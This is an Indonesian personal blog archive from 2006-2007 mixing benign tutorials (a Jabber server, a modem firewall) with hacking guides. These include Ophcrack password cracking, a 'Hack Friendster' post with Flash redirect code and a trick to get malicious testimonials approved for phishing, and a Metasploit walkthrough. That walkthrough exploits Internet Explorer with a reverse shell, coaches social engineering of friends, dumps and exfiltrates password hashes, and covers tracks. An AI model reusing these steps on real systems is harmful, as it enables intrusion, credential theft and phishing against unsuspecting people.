Cool and Illegal Wireless Hacks

7 02 2007

Cool and Illegal Wireless Hacks

Hacking Wireless using metasploit

check it out!! 😉





Membangun Instant Messenger Sendiri menggunakan Jabber/XMMP (bagian 1)

26 01 2007

Instant messaging merupakan fasilitas komunikasi chatting untuk para pengguna internet. Dengan menggunakan fasilitas ini, user dapat berkomunikasi dengan cara mengirimkan pesan berupa text dengan user lain. Selain itu, Instan Messaging juga berfungsi untuk tukar menukar file secara peer to peer. Saat ini Instan Messaging yang terkenal adalah Yahoo Messenger dan MSN Messenger. Namun kita dapat membuat Instan Messanger sendiri menggunakan protokol Jabber serta aplikasi yang Open Source dan serta memodifikasi client sesuai dengan keinginan kita. Bahkan saat ini, Google mengembangkan Instan Messengernya, Gtalk, yang juga berbasiskan protokol XMMP (Jabber).

Read the rest of this entry »





Membangun Instant Messenger Sendiri menggunakan Jabber/XMMP (bagian 2)

26 01 2007

Artikel ini merupakan lanjutan dari tutorial sebelumnya tentang Membangun Instant Messenger Sendiri menggunakan Jabber/XMMP. Disini akan dibahas mengenai bagaimana cara Instalasi server Instant Messenger yang lebih dikhususkan dengan menggunakan aplikasi ejabberd. Karena pada saat artikel ini dibuat versi Sistem Operasi dan aplikasi yang digunakan masih versi lama, untuk itu harap sesuaikan dengan versi yang lebih baru.

 

Instalasi Server Instant Messengger

Ada beberapa program yang dapat dijadikan Server yang digunakan pada sistem Instant Messaging ini. Yang pertama adalah ejabberd yang dikembangkan menggunakan bahasa pemrograman Erlang dan jive messenger yang berbasis java serta menggunakan database mysql. Selain itu, dapat pula menggunakan jabberd.

Setelah mencoba menginstall dan membandingkan beberapa program tersebut, penulis memilih untuk menggunakan ejabberd karena kemudahan instalasi dan administrasi serta sangat stabil untuk digunakan dalam skala besar. Namun, penulis juga menyarankan untuk mencoba menggunakan jive messenger yang sangat mudah di instal dan administrasi yang mudah dengan berbasis web, namun karena menggunakan java sehingga membutuhkan resource yang cukup besar. Selain itu karena database yang digunakan menggunakan mysql, maka kita dapat melakukan modifikasi dengan menggunakan bahasa pemrograman PHP. Untuk daftar server selengkapnya dapat dilihat di http://www.jabber.org/software/servers.shtml

..Siap membuat Instant Messanger sendiri??





Hack Windows XP Password dengan Ophcrack

24 01 2007

Intro

Sebelumnya saya pernah membuat tutorial mengenai Hack Windows XP (SP2) Passwords menggunakan pwdump6. Namun, cara tersebut mengharuskan user dengan status admin agar dapat ‘dump’ file HASH dari Windows. Sekarang saya akan menyampaikan cara lain untuk ‘cracking’ password Windows XP (semua versi) dengan menggunakan Ophcrack.

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

Hebatnya lagi, Ophcrack tersedia dalam bentuk LiveCD, sehingga tidak diperlukan proses instalasi dan tidak perlu password admin, hanya butuh akses agar komputer dapat booting dari CD (biasanya urutan booting default BIOS komputer saat ini dimulai dari CD/DVD ROM, so don’t worry) 😀 . Ophcrack LiveCD merupakan Linux yang berbasis SLAX (turunan dari Slackware) dan sudah terdapat Ophcrack dan Rainbow Table untuk cracking password alpanumerik.

Yuk kita ngeCrack..





Ngoprek Modem ADSL DareGlobal DB 102/108

11 01 2007

27_14.jpg

Bagi pengguna layanan akses internet Telkom Speedy, mungkin ada yang pernah atau sedang menggunakan modem ADSL DareGlobal DB 102/108. Kebetulan saya dirumah menggunakan modem jenis tersebut. Alasannya sederhana saja, karena disitu tertera logo Speedy dan telah memiliki QoA (Quality of Asurance) dari Telkom maka saya percaya saja dengan modem yang ditawarkan oleh Telkom, dan tentu saja dengan alasan harga yang masih terjangkau 😀 . Dalam paket kemasannya tertera beragam fasilitas dari modem ini, salah satunya adalah NAT/Firewall melalui MAC Filtering dan IP Filtering. Namun setelah dilakukan instalasi untuk melakukan dial PPPoE melalui tampilan webnya, ternyata fasilitas tersebut tidak ditemukan. Berikut adalan contoh tampilan administrasi modem tersebut yang bisa diakses melalui browser :

menumodem.JPG

Karena modem tersebut menyediakan layanan Telnet, akhirnya saya mencoba telnet ke modem tersebut :


C:\Documents and Settings\Chaidir>telnet 192.168.1.1
BCM96338 ADSL Router
Login: admin
Password:

telnet.JPG

Ternyata masih ada fasilitas yang belum ditampilkan dari konfigurasi berbasis web, contohnya adalah Firewall. Nah, sekarang saya ingin mencoba memanfaatkan fasilitas firewall modem tersebut. Contoh situs yang akan saya blok adalah Friendster, karena adik saya dirumah hanya tau internet buat Friendster saja, sekalian proses edukasi internet buat adik bahwa di internet bukan hanya ada Friendster 😀

Pertama liat IP Friendster terlebih dahulu dengan ping ke Friendster :

C:\Documents and Settings\Chaidir>ping Friendster.com
Pinging Friendster.com [209.11.168.242] with 32 bytes of data:

Setelah itu tinggal konfigurasi melalui Telnet. Dari menu utama pilih Firewall dengan menekan tombol ‘7’ :

Firewall Menu
1. IP Filtering
2. MAC Filtering
3. Exit
/ Firewall ->

Lalu pilih IP Filtering -> 1


IP Filtering Menu
1. Outgoing
2. Incoming
3. Exit
/ Firewall/IP Filtering ->

Pilih Outgoing -> 1

Outgoing IP Filtering Menu
1. Add
2. Remove
3. Show
4. Exit
/ Firewall/IP Filtering/Outgoing ->

Lalu pilih Add -> 1 .

Dan atur konfigurasi seperti dibawah ini (sesuaikan dengan IP yang anda peroleh dari Modem)

Outgoing IP Filtering Add
Note: Hit return at prompt if parameter is not used or to accept
Press <enter> to use current value
Press <esc> and <enter> to cancel
Filter name () : Block FS
Protocol [0-tcp&udp,1-tcp,2-udp,3-icmp] (1) : 0
Source IP address () : 192.168.1.2
Source subnet mask () : 255.255.255.0
Source port (port or port:port) () :
Destination IP address () : 209.11.168.242
Destination subnet mask () : 255.255.255.0
Destination port (port or port:port) () :
Hit <enter> to continue

Setelah itu pilih exit sampai menu utama, dan pilih Save and Reboot :

12. Save and Reboot
13. Exit
-> 12
Save current configuration and reboot? Confirm [1-yes,2-no] ==> 1

Tunggu beberapa saat sampai modem anda selesai Reboot dan mendapatkan IP dari DHCP modem. Lalu coba akses situs Friendster, apakah masih bisa? Karena yang di blok hanya port UDP dan TCP, maka ketika di ping ke Friendster, hal ini masih bisa dilakukan. Mungkin karena software firewall nya kurang sempurna kail ya.. makanya tidak dimasukkan dalam konfigurasi berbasis web 😀 Sebenarnya untuk memblok sebuah situs ada banyak cara yang lebih mudah, salah satunya dengan menginstall softawe firewall. Namun disini yang ditekankan adalah mengopreknya, itung-itung sekalian belajar konfigurasi modem lewat Telnet 😀 Masih ada beberapa fasilitas lagi dari modem ini diantaranya adalah Virtual Server dan DMZ. Silahkan dioprek lebih lanjut. Bagi yang memiliki modem dengan merek dan jenis lain, mungkin ada hal yang bisa dioprek lebih jauh.. silahkan saja telusuri lebih jauh.. 😀

Hayo adik-adik yang manis, lucu, imut… Om-om dan tante tante yang amit-amit…

jangan maen Friendster terus ya… 😛





Hack Friendster

12 12 2006

Dalam artikel saya sebelumnya mengenai Friendster palsu, teknik yang digunakan untuk me-redirect suatu profile dari Friendster adalah dengan menggunakan flash. Sekarang saya ingin memberikan contoh bagaimana kita me-redirect profile Friendster seseorang menuju URL yang kita inginkan. Pertama kita buat script flash sederhana seperti kode dibawah ini. Untuk yang menggunakan linux, install Ming package terlebih dahulu. Ming adalah library yang dapat menghasilkan file Macromedia Flash (.swf). Jika anda menggunakan ubuntu dan belum menginstall, jalankan perintah berikut :

apt-get install libming-util

Jika Ming berhasil diinstal, buat sebuah file dengan editor anda yang berisi kode berikut dan simpan dengan nama flash.as :

getURL("http://www.contoh.com");

misalkan seperti berikut :

getURL("https://chaidir.wordpress.com");

Setelah itu buat file flash (.swf) dengan menjalankan perintah berikut :

chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as

Jika berhasil, maka akan dihasilkan file Flash bernama out.swf. File ini ketika diakses dari browser, akan me-redirect ke URL yang kita definisikan sebelumnya. Contohnya silahkan akses flash yang telah saya buat disini. Apabila anda mengakses url tersebut, maka anda langsung ‘diarahkan’ menuju https://chaidir.wordpress.com.

Selanjutnya upload file flash tadi (out.swf) ke tempat yang mudah diakses. Misalkan di http://numpang.com/out.swf. Setelah itu, kirim testimonial ke orang yang ingin di berikan testimonial dengan memasukkan file flash ini.

Jangan mengirimkan testimonial ini keteman anda, karena profile teman anda tidak akan bisa diakses!

Caranya masukkan kode berikut :


<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0' width='400' height='250'><param name='movie' value='http://numpang.com/out.swf' /><param name='quality' value='high' /><embed src='http://numpang.com/out.swf' quality='high' pluginspage='http://www.macromedia.com/go/getflashplayer' type='application/x-shockwave-flash' width='400' height='250' allowScriptAccess="never"></embed></object>

Untuk mencoba apakah testimonial ini berhasil, klik priview. Agar sang penerima testimonial bisa meng-approve testimonial, hapus ganti file flash tadi terlebih dahulu (http://numpang.com/out.swf) dengan flash animasi yang menarik perhatian. Misalnya dengan flash dari Babaflash Forum. Baru setelah di approve, aktifkan ganti lagi (upload lagi) dengan file flash tadi.

Nah, dalam contoh kasus di Friendster palsu, sang cracker me-redirect setiap user yang ingin melihat profile yang sudah disusupi flash tadi dan mengarahkannya ke http://www.friendster.co.nr. Dan celakanya disitu dibuat halaman yang menyerupai halaman login Friendster dan seolah-olah terjadi kesalahan yang mengharuskan setiap user memasukkan email dan passwordnya.

‘Fasilitas’ untuk mengirimkan testimonial di Friendster inilah yang dimanfaatkan cracker untuk ‘mengelabuhi’ orang-orang yang sering bermain-main dengan Friendster. Oleh karena itu, berhati-hatilah terhadap testimonial yang menggunakan flash. Jika mendapatkan testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash yang ngga penting, lebih baik tidak usah di approve aja.

Pesan buat anak2 ABG pecinta Friendster :

Dan buat anak2 ABG yang sering ke warnet hanya untuk ber-Friendster ria.. apakah tidak ada aktivitas lain di internet selain ber-Friendsteran?! Sangat sayang sekali jika kamu ke warnet cuman liat cowo2 ato cewe2 yang friendsterGenic (keren di friendster doang!) Mendingan belajar cari informasi yang menarik atau belajar apapun dari Internet. Atau lebih baik lagi klo kamu buat buat blog sendiri. Selain belajar nulis, kamu kan juga bisa nambah temen baru. Rugi loh klo bayar 3000 – 4000 perak cuman buat ngeliat Friendster doang, mendingan buat beli bakso!

Referensi :

http://ezinearticles.com/?Redirect-Your-MySpace-Traffic-With-Flash&id=364276

Sekilas info :

ternyata http://www.friendster.co.nr dah diubah toh… hihihi :-D. Maaf ya kk.. dah publish ‘karya’ kamu 😀





Belajar Hack Yuck! (3) – Hack Windows XP SP2

14 11 2006

*Fyuhh… akhirnya sempet juga nyelesain tulisan ini. Yosh.. here is the prof of concept!.

Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.

Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.

Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.

Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!

Pertama2 jalankan ‘mfsconsole’!

main1.JPG

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.

Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.

This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

Untuk melihat info dari exploit ini gunakan perintah :

msf > info ie_vml_rectfill

Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja 😀 ).


Untuk menggunakan exploit gunakan perintah2 berikut dalam console :

msf > use_ie_vml_rectfill

msf > set PAYLOAD win32_reverse

msf > set RHOST ip_target

msf > set LHOST ip_penyerang

msf > exploit

Hasilnya akan tampak seperti gambar berikut :

exploit1.JPG

Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus 😀

Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

 

Crack da Password!

Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!

Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :

pwdump.JPG

Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah

C:\temp\Pwdump –o pass.txt 127.0.0.1

Klo berhasil akan tampak pada gambar berikut.

 dump1.JPG

 Lalu copy file pass.txt ke komputer kita

C:\temp\copy pass.txt z:

Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

clean.JPG

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).

Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.

Happy Hacking…..

 

Beberapa saran agar windows kita tetap aman terhadap exploit diatas.

1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.

2. Patch Windows anda.

3. Gunakan antivirus dengan update terbaru

4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p

 

 

Reference :

http://www.metasploit.com